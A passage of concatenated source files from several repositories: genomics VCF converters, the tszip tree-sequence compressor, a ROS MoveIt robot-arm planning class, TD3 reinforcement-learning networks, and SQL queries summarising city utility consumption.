return options ################################################################################ def main(options): """ Convert vcf to eigenstrat format (ind, snp and geno files) """ vcf=gdc.open2(options["vcf"]) snp, ind, geno = [open(options["out"]+x, "w") for x in [".snp", ".ind", ".geno"]] removed={"multiallelic":0, "indel":0} count=0 if options["indmap"]: pop_map={} sex_map={} ind_map_file=open(options["indmap"], "r") for line in ind_map_file: bits=line[:-1].split() pop_map[bits[0]]=bits[2] sex_map[bits[0]]=bits[1] ind_map_file.close() for line in vcf: if line[:2]=="##": # Comment line next elif line[:6]=="#CHROM": # Header line inds=line.split()[9:] if options["ref"]: ind.write(options["ref"]+"\tU\tREF\n") if options["indmap"]: for indi in inds: ind.write(indi+"\t"+sex_map.get(indi, 
"U")+"\t"+pop_map.get(indi, "POP")+"\n") elif options["indAsPop"]: for indi in inds: ind.write(indi+"\tU\t"+indi+"\n") else: for indi in inds: ind.write(indi+"\tU\tPOP\n") else: # data bits=line.split() if "," in bits[4]: removed["indel"]+=1 continue if len(bits[3])!=1 or len(bits[4])!=1: removed["multiallelic"]+=1 continue else: if bits[2]==".": bits[2]=bits[0]+":"+bits[1] snp.write(" ".join([bits[2], bits[0], "0.0", bits[1], bits[3], bits[4]])+"\n") geno_string="" if options["ref"]: geno_string="2" for gt in bits[9:]: geno_string+=decode_gt_string(gt) geno.write(geno_string+"\n") count+=1 [f.close for f in [ind, snp, geno]] print "Done. Wrote "+str(count) + " sites" print "Excluded " + str(sum(removed.values())) + " sites" for key in removed: print "Excluded " + str(removed[key]) + " " + key return ################################################################################ def decode_gt_string(gt_string): """ Tries to work out the genotype from a vcf genotype entry. 9 for missing [or not in {0,1,2}] """ gt=gt_string.split(":")[0] if len(gt)==1: if gt=="0": # haploid return "2" elif gt=="1": return "0" else: return "9" elif len(gt)==3: if gt[0]=="0" and gt[2]=="0": return "2" if gt[0]=="0" and gt[2]=="1": return "1" if gt[0]=="1" and gt[2]=="0": return "1" if gt[0]=="1" and gt[2]=="1": return "0" else: return "9" raise Exception("Unknown genotype: "+gt) ################################################################################ if __name__=="__main__": options=parse_options() main(options) ``` #### File: aabiddanda/gdc/vcf2freq.py ```python from __future__ import division, print_function from collections import defaultdict import argparse, sys import pdb ################################################################################ def parse_options(): """ Try using argparse """ parser=argparse.ArgumentParser() parser.add_argument('-i', '--input', type=argparse.FileType('r'), default="-") parser.add_argument('-p', '--panel', type=str, action="store", default=None, help= "Two column file mapping IDs to populations") return parser.parse_args() ################################################################################ def read_panel(panel_file): """ Open the panel file and return a dictionary that maps sample to popuation """ map={} pf=open(panel_file, "r") for line in pf: bits=line.split() map[bits[0]]=bits[1] pops=list(set(map.values())) pops.sort() return map, pops ################################################################################ def main(options): """ run through the file and output to stdout. """ map, pops=read_panel(options.panel) print("\t".join(["SNPID", "CHR", "POS", "REF", "ALT"]+pops)) samples=[] for line in options.input: if line.startswith("##"): pass elif line.startswith("#"): #Header line samples=line.split()[9:] else: #This is a data line. counts=defaultdict(int) totals=defaultdict(int) bits=line.split() first_cols=[bits[2], bits[0], bits[1], bits[3], bits[4]] for i in range(9, len(bits)): if samples[i-9] not in map: continue for j in [0,1]: if bits[i][j]=="0": totals[map[samples[i-9]]]+=1 if bits[i][j]=="1": counts[map[samples[i-9]]]+=1 totals[map[samples[i-9]]]+=1 freqs=[0.0]*len(pops) try: for i,pop in enumerate(pops): freqs[i]=counts[pop]/totals[pop] print("\t".join(first_cols+[format(x, "1.4f") for x in freqs])) except ZeroDivisionError: continue ################################################################################ if __name__=="__main__": options=parse_options() main(options) ```
{ "source": "aabiddanda/tszip", "score": 2 }
#### File: tszip/tszip/compression.py ```python import contextlib import json import logging import os.path import tempfile import warnings import zipfile from typing import Mapping import humanize import numcodecs import numpy as np import tskit import zarr from . import exceptions from . import provenance logger = logging.getLogger(__name__) FORMAT_NAME = "tszip" FORMAT_VERSION = [1, 0] def minimal_dtype(array): """ Returns the smallest dtype that can be used to represent the values in the specified array. If the array is not one of the integer types, the dtype of the array itself is returned directly. """ dtype = array.dtype if array.shape[0] == 0: return dtype if dtype.kind == "u": maxval = np.max(array) dtypes = [np.uint8, np.uint16, np.uint32, np.uint64] for dtype in map(np.dtype, dtypes): if maxval <= np.iinfo(dtype).max: break elif dtype.kind == "i": minval = np.min(array) maxval = np.max(array) dtypes = [np.int8, np.int16, np.int32, np.int64] for dtype in map(np.dtype, dtypes): if np.iinfo(dtype).min <= minval and maxval <= np.iinfo(dtype).max: break return dtype def compress(ts, path, variants_only=False): """ Compresses the specified tree sequence and writes it to the specified path. By default, fully lossless compression is used so that tree sequences are identical before and after compression. By specifying the ``variants_only`` option, a lossy compression can be used, which discards any information that is not needed to represent the variants (which are stored losslessly). :param tskit.TreeSequence ts: The input tree sequence. :param str destination: The string or :class:`pathlib.Path` instance describing the location of the compressed file. :param bool variants_only: If True, discard all information not necessary to represent the variants in the input file. """ destination = str(path) # Write the file into a temporary directory on the same file system so that # we can write the output atomically. destdir = os.path.dirname(os.path.abspath(destination)) with tempfile.TemporaryDirectory(dir=destdir, prefix=".tszip_work_") as tmpdir: filename = os.path.join(tmpdir, "tmp.trees.tgz") logging.debug(f"Writing to temporary file {filename}") with zarr.ZipStore(filename, mode="w") as store: root = zarr.group(store=store) compress_zarr(ts, root, variants_only=variants_only) os.replace(filename, destination) logging.info(f"Wrote {destination}") def decompress(path): """ Decompresses the tszip compressed file and returns a tskit tree sequence instance. :param str path: The location of the tszip compressed file to load. :rtype: tskit.TreeSequence :return: A :class:`tskit.TreeSequence` instance corresponding to the the specified file. """ with load_zarr(path) as root: return decompress_zarr(root) class Column: """ A single column that is stored in the compressed output. 
""" def __init__(self, name, array, delta_filter=False): self.name = name self.array = array self.delta_filter = delta_filter def compress(self, root, compressor): shape = self.array.shape chunks = shape if shape[0] == 0: chunks = (1,) dtype = minimal_dtype(self.array) filters = None if self.delta_filter: filters = [numcodecs.Delta(dtype=dtype)] compressed_array = root.empty( self.name, chunks=chunks, shape=shape, dtype=dtype, filters=filters, compressor=compressor, ) compressed_array[:] = self.array ratio = 0 if compressed_array.nbytes > 0: ratio = compressed_array.nbytes / compressed_array.nbytes_stored logger.debug( "{}: output={} compression={:.1f}".format( self.name, humanize.naturalsize(compressed_array.nbytes_stored, binary=True), ratio, ) ) def compress_zarr(ts, root, variants_only=False): provenance_dict = provenance.get_provenance_dict({"variants_only": variants_only}) if variants_only: logging.info("Using lossy variants-only compression") # Reduce to site topology. Note that we will remove # any sites, individuals and populations here that have no references. ts = ts.simplify(reduce_to_site_topology=True) tables = ts.tables with warnings.catch_warnings(): warnings.simplefilter("ignore") # When using a zipfile in Zarr we get some harmless warnings. See # https://zarr.readthedocs.io/en/stable/api/storage.html#zarr.storage.ZipStore root.attrs["format_name"] = FORMAT_NAME root.attrs["format_version"] = FORMAT_VERSION root.attrs["sequence_length"] = tables.sequence_length root.attrs["provenance"] = provenance_dict columns = {} for key, value in tables.asdict().items(): if isinstance(value, dict): for sub_key, sub_value in value.items(): columns[f"{key}/{sub_key}"] = sub_value else: columns[key] = value if variants_only: time = np.unique(tables.nodes.time) columns["node/time"] = np.searchsorted(time, tables.nodes.time) # Encoding array is a tuple so must be converted columns["encoding_version"] = np.asarray(columns["encoding_version"]) # Sequence length is stored as an attr for compatibility with older versions of tszip del columns["sequence_length"] # Schemas and metadata need to be converted to arrays for name in columns: if name.endswith("metadata_schema"): columns[name] = np.frombuffer(columns[name].encode("utf-8"), np.int8) if name.endswith("metadata"): columns[name] = np.frombuffer(columns[name], np.int8) # Some columns benefit from being quantised coordinates = np.unique( np.hstack( [ [0, ts.sequence_length], tables.edges.left, tables.edges.right, tables.sites.position, tables.migrations.left, tables.migrations.right, ] ) ) columns["coordinates"] = coordinates for name in [ "edges/left", "edges/right", "migrations/left", "migrations/right", "sites/position", ]: columns[name] = np.searchsorted(coordinates, columns[name]) # Some columns benefit from additional options delta_filter_cols = ["edges/parent", "sites/position"] # Note: we're not providing any options to set this here because Blosc+Zstd seems to # have a clear advantage in compression performance and speed. There is very little # difference between compression level 6 and 9, and it's extremely fast in any case # so there's no point in adding complexity. The shuffle filter in particular makes # big difference. 
compressor = numcodecs.Blosc( cname="zstd", clevel=9, shuffle=numcodecs.Blosc.SHUFFLE ) for name, data in columns.items(): Column( name, data, delta_filter="_offset" in name or name in delta_filter_cols ).compress(root, compressor) def check_format(root): try: format_name = root.attrs["format_name"] format_version = root.attrs["format_version"] except KeyError as ke: raise exceptions.FileFormatError("Incorrect file format") from ke if format_name != FORMAT_NAME: raise exceptions.FileFormatError( "Incorrect file format: expected '{}' got '{}'".format( FORMAT_NAME, format_name ) ) if format_version[0] < FORMAT_VERSION[0]: raise exceptions.FileFormatError( "Format version {} too old. Current version = {}".format( format_version, FORMAT_VERSION ) ) if format_version[0] > FORMAT_VERSION[0]: raise exceptions.FileFormatError( "Format version {} too new. Current version = {}".format( format_version, FORMAT_VERSION ) ) @contextlib.contextmanager def load_zarr(path): path = str(path) try: store = zarr.ZipStore(path, mode="r") except zipfile.BadZipFile as bzf: raise exceptions.FileFormatError("File is not in tgzip format") from bzf root = zarr.group(store=store) try: check_format(root) yield root finally: store.close() def decompress_zarr(root): coordinates = root["coordinates"][:] dict_repr = {"sequence_length": root.attrs["sequence_length"]} quantised_arrays = [ "edges/left", "edges/right", "migrations/left", "migrations/right", "sites/position", ] for key, value in root.items(): if isinstance(value, Mapping): for sub_key, sub_value in value.items(): if f"{key}/{sub_key}" in quantised_arrays: dict_repr.setdefault(key, {})[sub_key] = coordinates[sub_value] elif sub_key.endswith("metadata_schema"): dict_repr.setdefault(key, {})[sub_key] = bytes(sub_value).decode( "utf-8" ) else: dict_repr.setdefault(key, {})[sub_key] = sub_value elif key.endswith("metadata_schema"): dict_repr[key] = bytes(value).decode("utf-8") elif key.endswith("metadata"): dict_repr[key] = bytes(value) else: dict_repr[key] = value return tskit.TableCollection.fromdict(dict_repr).tree_sequence() def print_summary(path, verbosity=0): arrays = [] def visitor(array): if isinstance(array, zarr.core.Array): arrays.append(array) with load_zarr(path) as root: root.visitvalues(visitor) arrays.sort(key=lambda x: x.nbytes_stored) max_name_len = max(len(array.name) for array in arrays) stored = [ humanize.naturalsize(array.nbytes_stored, binary=True) for array in arrays ] max_stored_len = max(len(size) for size in stored) actual = [humanize.naturalsize(array.nbytes, binary=True) for array in arrays] max_actual_len = max(len(size) for size in actual) line = "File: {}\t{}".format( path, humanize.naturalsize(os.path.getsize(path), binary=True) ) print(line) if verbosity > 0: print("format_version:", root.attrs["format_version"]) prov = root.attrs["provenance"] print("provenance: ", end="") print(json.dumps(prov, indent=4, sort_keys=True)) fmt = "{:<{}} {:<{}}\t{:<{}}\t{}" line = fmt.format( "name", max_name_len, "stored", max_stored_len, "actual", max_actual_len, "ratio", ) print(line) for array, stored, actual in zip(arrays, stored, actual): ratio = 0 if array.nbytes > 0: ratio = array.nbytes_stored / array.nbytes line = fmt.format( array.name, max_name_len, stored, max_stored_len, actual, max_actual_len, f"{ratio:.2f}", ) print(line) if verbosity > 0: for line in str(array.info).splitlines(): print("\t", line) ```
{ "source": "AABL-Lab/hlpr_manipulation", "score": 2 }
#### File: src/hlpr_manipulation_utils/arm_moveit.py ```python import sys import os import rospy import moveit_commander import moveit_msgs.msg import moveit_msgs.srv import geometry_msgs.msg import std_msgs.msg import wpi_jaco_msgs.msg import wpi_jaco_msgs.srv from math import pi, floor, ceil, fabs print("*"*80) print("THIS FILE IS DEPRECATED, USE arm_moveit2.py INSTEAD") print("*"*80) class ArmMoveIt: def __init__(self, planning_frame='base_link', default_planner="RRTConnectkConfigDefault", orientation_tolerance=None): # Make sure the moveit service is up and running rospy.logwarn("Waiting for MoveIt! to load") try: rospy.wait_for_service('compute_ik') except rospy.ROSException, e: rospy.logerr("No moveit service detected. Exiting") exit() else: rospy.loginfo("MoveIt detected: arm planner loading") # Check if we're using the 7dof if os.environ.get("ROBOT_NAME") == 'poli2': is_7dof = True else: is_7dof = os.environ['VECTOR_HAS_KINOVA_7DOF_ARM'] # self.pose = geometry_msgs.msg.PoseStamped() ## Instantiate a RobotCommander object. This object is an interface to ## the robot as a whole. self.robot = moveit_commander.RobotCommander() ## Instantiate a PlanningSceneInterface object. This object is an interface ## to the world surrounding the robot. self.scene = moveit_commander.PlanningSceneInterface() ## Instantiate a MoveGroupCommander object. This object is an interface ## to one group of joints. In this case the group is the joints in the left ## arm. This interface can be used to plan and execute motions on the left ## arm. self.group = [moveit_commander.MoveGroupCommander("arm")] # Set orientation tolerance if provided if orientation_tolerance is not None: rospy.loginfo("Setting orientation tolerance to {}".format(orientation_tolerance)) self.group[0].set_goal_orientation_tolerance(orientation_tolerance) # Set the planner self.planner = default_planner # Set the planning pose reference frame self.group[0].set_pose_reference_frame(planning_frame) # Set continuous joint names if is_7dof: self.continuous_joints = ['joint_1','joint_3','joint_5','joint_7'] # NOTE: order that moveit currently is configured # ['joint_1, joint_2, joint_3, joint_4, joint_5, joint_6, joint_7'] self.continuous_joints_list = [0,2,4,6] # joints that are continous else: self.continuous_joints = ['shoulder_pan_joint','wrist_1_joint','wrist_2_joint','wrist_3_joint'] # NOTE: order that moveit currently is configured # ['right_shoulder_pan_joint', 'right_shoulder_lift_joint', 'right_elbow_joint', 'right_wrist_1_joint', 'right_wrist_2_joint', 'right_wrist_3_joint'] self.continuous_joints_list = [0,3,4,5] # joints that are continous def get_IK(self, newPose, root = None): ## from a defined newPose (geometry_msgs.msg.Pose()), retunr its correspondent joint angle(list) rospy.wait_for_service('compute_ik') compute_ik = rospy.ServiceProxy('compute_ik', moveit_msgs.srv.GetPositionIK) wkPose = geometry_msgs.msg.PoseStamped() if root is None: wkPose.header.frame_id = self.group[0].get_planning_frame() # name:odom else: wkPose.header.frame_id = root wkPose.header.stamp=rospy.Time.now() wkPose.pose=newPose msgs_request = moveit_msgs.msg.PositionIKRequest() msgs_request.group_name = self.group[0].get_name() # name: arm # msgs_request.robot_state = robot.get_current_state() msgs_request.pose_stamped = wkPose msgs_request.timeout.secs = 2 msgs_request.avoid_collisions = False try: jointAngle=compute_ik(msgs_request) ans=list(jointAngle.solution.joint_state.position[2:9]) if jointAngle.error_code.val == -31: print 'No IK solution' return 
None return ans except rospy.ServiceException, e: print "Service call failed: %s"%e def get_FK(self, root = 'base_link'): rospy.wait_for_service('compute_fk') compute_fk = rospy.ServiceProxy('compute_fk', moveit_msgs.srv.GetPositionFK) header = std_msgs.msg.Header() header.frame_id = root header.stamp = rospy.Time.now() fk_link_names = ['j2s7s300_ee_link'] robot_state = self.robot.get_current_state() try: reply=compute_fk(header,fk_link_names,robot_state) return reply.pose_stamped except rospy.ServiceException, e: print "Service call failed: %s"%e def get_FK_wpi(self, joints = None): rospy.wait_for_service('/jaco_arm/kinematics/fk') compute_fk = rospy.ServiceProxy('/jaco_arm/kinematics/fk', wpi_jaco_msgs.srv.JacoFK) if joints is None: joints = [pi,pi,pi,pi,pi,pi,pi] try: pose=compute_fk(joints) return pose except rospy.ServiceException, e: print "Service call failed: %s"%e def plan_targetInput(self, target, joint_flag): '''Generic target planner that what type is specified''' try: if (joint_flag): self.group[0].set_joint_value_target(self._simplify_joints(target)) else: self.group[0].set_pose_target(target) self.group[0].set_planner_id(self.planner) planAns=self.group[0].plan() return planAns except: print 'No plan found, see the moveit terminal for the error' print("Unexpected error:", sys.exc_info()[0]) return None def plan_targetInputWaypoint(self, targets, joint_flag, merged=False, current_joints=None): '''Generic target planner that what type is specified''' ## input: list of pose (geometry_msgs.msg.Pose()) ## output: plan from current pose all of the target poses ## If merge true - then a single large plan is returned ## If merge is false - then several plans in an array are returned # Plan each pose individually and stitch together try: full_plan = [] points = [] current_state = self.robot.get_current_state() if current_joints is not None: current_state = self.set_robot_state_joint_dict(current_joints) for target in targets: self.group[0].set_start_state(current_state) plan = self.plan_targetInput(target, joint_flag) if plan is not None: full_plan.append(plan) if merged: points = self.merge_points(points, plan.joint_trajectory.points) traj = plan.joint_trajectory current_state = self.set_robot_state_pose(traj) else: print 'No full plan found, see the moveit terminal for the error' return None if merged: plan = full_plan[0] plan.joint_trajectory.points = points return plan else: return full_plan except: print 'No plan found, see the moveit terminal for the error' print("Unexpected error:", sys.exc_info()[0]) return None def set_robot_state_pose(self, traj): '''Gets the current robot state pose and sets it to the joint pose''' cur_robot_state = self.robot.get_current_state() last_point = traj.points[-1].positions # convert the joints to array joints = [x for x in cur_robot_state.joint_state.position] for i in xrange(len(traj.joint_names)): # Find index of joint joint_name = traj.joint_names[i] idx = cur_robot_state.joint_state.name.index(joint_name) joints[idx] = last_point[i] # Set full joint tuple now cur_robot_state.joint_state.position = joints return cur_robot_state def set_robot_state_joint_dict(self, joint_dict): cur_robot_state = self.robot.get_current_state() joints = [x for x in cur_robot_state.joint_state.position] for joint_name in joint_dict: idx = cur_robot_state.joint_state.name.index(joint_name) joints[idx] = joint_dict[joint_name] cur_robot_state.joint_state.position = joints return cur_robot_state def merge_points(self, points, new_points): '''Merge two sets of 
points and taking into account time''' # Check if this is the first set if len(points) < 1: return new_points all_points = points # Pull out the last time from current points last_point_time = points[-1].time_from_start+rospy.Duration(0.1) for point in new_points: point.time_from_start = point.time_from_start+last_point_time all_points = all_points + [point] return all_points def _simplify_angle(self, angle): # Very simple function that makes sure the angles are between -pi and pi if angle > pi: while angle > pi: angle -= 2*pi elif angle < -pi: while angle < -pi: angle += 2*pi return angle def _simplify_joints(self, joint_dict): # Helper function to convert a dictionary of joint values if isinstance(joint_dict, dict): simplified_joints = dict() for joint in joint_dict: # Pull out the name of the joint joint_name = '_'.join(joint.split('_')[1::]) if joint_name in self.continuous_joints: simplified_joints[joint] = self._simplify_angle(joint_dict[joint]) else: simplified_joints[joint] = joint_dict[joint] elif isinstance(joint_dict, list): simplified_joints = [] for i in xrange(len(joint_dict)): a = joint_dict[i] if i in self.continuous_joints_list: simplified_joints.append(self._simplify_angle(a)) else: simplified_joints.append(a) return simplified_joints '''Older functions - left for backwards compatibility''' def plan_jointTargetInput(self,target_joint): ## input: target joint angles (list) of the robot ## output: plan from current joint angles to the target one try: self.group[0].set_joint_value_target(self._simplify_joints(target_joint)) self.group[0].set_planner_id(self.planner) planAns=self.group[0].plan() return planAns except: print 'No plan found, see the moveit terminal for the error' print("Unexpected error:", sys.exc_info()[0]) return None def plan_poseTargetInput(self,target_pose): ## input: tart pose (geometry_msgs.msg.Pose()) ## output: plan from current pose to the target one try: self.group[0].set_pose_target(target_pose) self.group[0].set_planner_id(self.planner) planAns=self.group[0].plan() return planAns except: print 'No plan found, see the moveit terminal for the error' print("Unexpected error:", sys.exc_info()[0]) return None def box_table_scene(self) : #Scene : add box # after loading this object/scene, need to do "add" ==> "planning scene" # in the rviz interface if one want to see the box rospy.sleep(2) self.scene.remove_world_object("table_box") p = geometry_msgs.msg.PoseStamped() p.header.frame_id = self.robot.get_planning_frame() p.pose.position.x = 1.64 p.pose.position.y = 0.0 p.pose.position.z = 0.25 p.pose.orientation.w = 0.0 self.scene.add_box("table_box",p,(0.75, 1, 0.5)) rospy.sleep(5) def wayPointIK(self, wps, numSteps = None, ik_root = None): if numSteps is None: numSteps = 3 jointWps = [] for i in range(0, len(wps)): jointP = self.get_IK(wps[i], ik_root) if jointP is None: jointWps = None break jointWps.append(jointP) return jointWps def ask_scene_integration(arm): # Ask the user if want to integrate a box scene answer= input("""\n Integrate a box as a table from code ? (1 or 0) (if 1: box can't be displaced nor resized by user, if 0: no scene (can always do add from rviz interface) ) \n""") if answer == 1: arm.box_table_scene() print "\n Box inserted; to see it ==> rviz interface ==> add button==> planning scene " return else: print "\n No scene added" return def ask_position(arm,tarPose): #Ask the user the values of the target position while True: try: inputPosition=input(""" \n Target position coord. 
(format: x,y,z or write -1 to take the robot current position ): """) if inputPosition == -1: inputPosition=tarPose.position return inputPosition except (ValueError,IOError,NameError): print("\n Please, enter the coordinate in the following format: x,y,z ") continue else: if len(list(inputPosition)) == 3: poseTmp= geometry_msgs.msg.Pose() poseTmp.position.x=inputPosition[0] poseTmp.position.y=inputPosition[1] poseTmp.position.z=inputPosition[2] return poseTmp.position else: print("\n Please, enter the coordinate in the following format: x,y,z ") continue def ask_orientation(arm,tarPose): # Ask the user the values of the target quaternion while True: try: inputQuat=input(""" \n Target quaternion coordi. (format: qx,qy,qz,qw or write -1 to take the robot current quaternion ):""") if inputQuat == -1: inputQuat=arm.group[0].get_current_pose().pose.orientation return inputQuat except (ValueError,IOError,NameError): print("\n Please, enter the coordinate in the following format: qx,qy,qz,qw ") continue else: if len(list(inputQuat)) == 4: poseTmp= geometry_msgs.msg.Pose() poseTmp.orientation.x=inputQuat[0] poseTmp.orientation.y=inputQuat[1] poseTmp.orientation.z=inputQuat[2] poseTmp.orientation.w=inputQuat[3] return poseTmp.orientation else: print("\n Please, enter the coordinate in the following format: qx,qy,qz,qw ") def main(): arm = ArmMoveIt() tarPose = geometry_msgs.msg.Pose() ## ask if integrate object scene from code or not ask_scene_integration(arm) while not rospy.is_shutdown(): ## Assigned tarPose the current Pose of the robot tarPose = arm.group[0].get_current_pose().pose ## ask input from user (COMMENT IF NOT USE AND WANT TO ASSIGN MANUAL VALUE IN CODE) tarPose.position = ask_position(arm,tarPose) tarPose.orientation = ask_orientation(arm,tarPose) ## Example of Assigned values for new targetPose to robot # tarPose.position.x = 0.89 # tarPose.position.y = 0.00 # tarPose.position.z = 0.32 # tarPose.orientation.x = 0.0 print '\n The target coordinate is: %s \n' %tarPose ## IK for target position jointTarg = arm.get_IK(tarPose) print 'IK calculation step:DONE' ## planning with joint target from IK planTraj = arm.plan_jointTargetInput(jointTarg) print 'Planning step with target joint angles:DONE' ## planning with pose target #print 'Planning step with target pose' #planTraj = arm.plan_poseTargetInput(tarPose) ## execution of the movement #print 'Execution of the plan' # arm.group[0].execute(planTraj) if __name__ == '__main__': ## First initialize moveit_commander and rospy. moveit_commander.roscpp_initialize(sys.argv) rospy.init_node('vector_basic_IK', anonymous=True) main() ```
{ "source": "AABL-Lab/Standard_ML_Library", "score": 3 }
#### File: Standard_ML_Library/td3/td3_networks.py ```python import numpy as np import os import torch import torch.nn as nn import torch.optim as optim import torch.nn.functional as F class CriticNetwork(nn.Module): def __init__(self, beta, input_dims, fc1_dims, fc2_dims, n_actions, name, chkpt_dir="tmp/td3", device=None): super(CriticNetwork, self).__init__() self.input_dims = input_dims self.fc1_dims = fc1_dims self.fc2_dims = fc2_dims self.n_actions = n_actions self.name = name self.checkpoint_dir = chkpt_dir self.checkpoint_file = os.path.join(self.checkpoint_dir, name+"_td3") self.fc1 = nn.Linear(self.input_dims[0] + n_actions, self.fc1_dims) self.fc2 = nn.Linear(self.fc1_dims, self.fc2_dims) self.q1 = nn.Linear(self.fc2_dims, 1) self.optimizer = optim.Adam(self.parameters(), lr=beta) if device is None: # auto-detect only when no device was passed in self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") else: self.device = device self.to(self.device) def forward(self, state, action): q1_action_value = self.fc1(torch.cat([state, action], dim=1)) q1_action_value = F.relu(q1_action_value) q1_action_value = self.fc2(q1_action_value) q1_action_value = F.relu(q1_action_value) q1 = self.q1(q1_action_value) return q1 def save_checkpoint(self): print("saving checkpoint") torch.save(self.state_dict(), self.checkpoint_file) def load_checkpoint(self): print("loading checkpoint") self.load_state_dict(torch.load(self.checkpoint_file)) class ActorNetwork(nn.Module): def __init__(self, alpha, input_dims, fc1_dims, fc2_dims, n_actions, name, chkpt_dir="tmp/td3", device=None): super(ActorNetwork, self).__init__() self.input_dims = input_dims self.fc1_dims = fc1_dims self.fc2_dims = fc2_dims self.n_actions = n_actions self.name = name self.checkpoint_dir = chkpt_dir self.checkpoint_file = os.path.join(self.checkpoint_dir, name+"_td3") # the * is for tuple unpacking self.fc1 = nn.Linear(*self.input_dims, self.fc1_dims) self.fc2 = nn.Linear(self.fc1_dims, self.fc2_dims) self.mu = nn.Linear(self.fc2_dims, self.n_actions) self.optimizer = optim.Adam(self.parameters(), lr=alpha) if device is None: # auto-detect only when no device was passed in self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") else: self.device = device self.to(self.device) def forward(self, state): prob = self.fc1(state) prob = F.relu(prob) prob = self.fc2(prob) prob = F.relu(prob) mu = torch.tanh(self.mu(prob)) return mu def save_checkpoint(self): print("saving checkpoint") torch.save(self.state_dict(), self.checkpoint_file) def load_checkpoint(self): print("loading checkpoint") self.load_state_dict(torch.load(self.checkpoint_file)) ```
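A quick smoke test for the two networks above; the dimensions are arbitrary examples and the module name in the import is an assumption based on the file path.

```python
import torch
from td3_networks import ActorNetwork, CriticNetwork  # assumed module name

state_dim, n_actions = 8, 2
actor = ActorNetwork(alpha=1e-3, input_dims=[state_dim], fc1_dims=400, fc2_dims=300,
                     n_actions=n_actions, name="actor", device=torch.device("cpu"))
critic = CriticNetwork(beta=1e-3, input_dims=[state_dim], fc1_dims=400, fc2_dims=300,
                       n_actions=n_actions, name="critic_1", device=torch.device("cpu"))

state = torch.randn(4, state_dim)   # batch of 4 states
action = actor(state)               # actions squashed into [-1, 1] by tanh
q_value = critic(state, action)     # one Q estimate per (state, action) pair
print(action.shape, q_value.shape)  # torch.Size([4, 2]) torch.Size([4, 1])
```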
{ "source": "aabmass/CIS4301-Project-GUL", "score": 3 }
#### File: backend/app/funFacts.py ```python import sys sys.path.append("../") from loaddb import dbutil def maxCityElect(): return dbutil.runSQLAsDict("""SELECT streetaddress, consumption from address, electricityreport where ( select Max(Consumption) from electricityreport) = electricityreport.consumption AND address.id = electricityreport.address_id""") def maxCityWater(): return dbutil.runSQLAsDict("""SELECT streetaddress, consumption from address, waterreport where ( select Max(Consumption) from waterreport) = waterreport.consumption AND address.id = waterreport.address_id""") def maxCityNatGas(): return dbutil.runSQLAsDict("""SELECT streetaddress, consumption from address, naturalgasreport where ( select Max(Consumption) from naturalgasreport) = naturalgasreport.consumption AND address.id = naturalgasreport.address_id""") def potentialLandscapingCustomers(): return dbutil.runSQLAsDict("""SELECT Count(violation) as LawnsInNeed from codeviolationsreport where violation = 'Overgrown Yard / Weeds'""") def fowlPlay(): return dbutil.runSQLAsDict("""SELECT count(id) as FowlViolations from CODEVIOLATIONSREPORT where VIOLATION = 'Fowl or Livestock Prohibited'""") def treeSqueezers(): return dbutil.runSQLAsDict("""SELECT count(id) as TreeViolations from CODEVIOLATIONSREPORT where VIOLATION = 'Dead or Hazardous Trees'""") def avgNumOne(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '1 %'""") def avgNumThree(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '3 %'""") def avgNumFour(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '4 %'""") def avgNumFive(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '5 %'""") def avgNumSix(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '6 %'""") def avgNumSeven(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as
ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '7 %'""") def avgNumEight(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '8 %'""") def avgNumNine(): return dbutil.runSQLAsDict("""SELECT avg(electricityreport.consumption) as ElectAvg, avg(waterreport.consumption) as WaterAvg, avg(naturalgasreport.consumption) as NatGasAvg from ELECTRICITYREPORT, waterreport, address, naturalgasreport where ELECTRICITYREPORT.ADDRESS_ID = address.id AND Waterreport.address_id = address.id and NaturalGasReport.address_id = address.id and address.streetaddress LIKE '9 %'""") ``` #### File: backend/app/naturalgas.py ```python import sys sys.path.append("../") from loaddb import dbutil def cityTotalNatGas(): x = dbutil.runSQLAsDict("""SELECT SUM(Consumption) as tot from 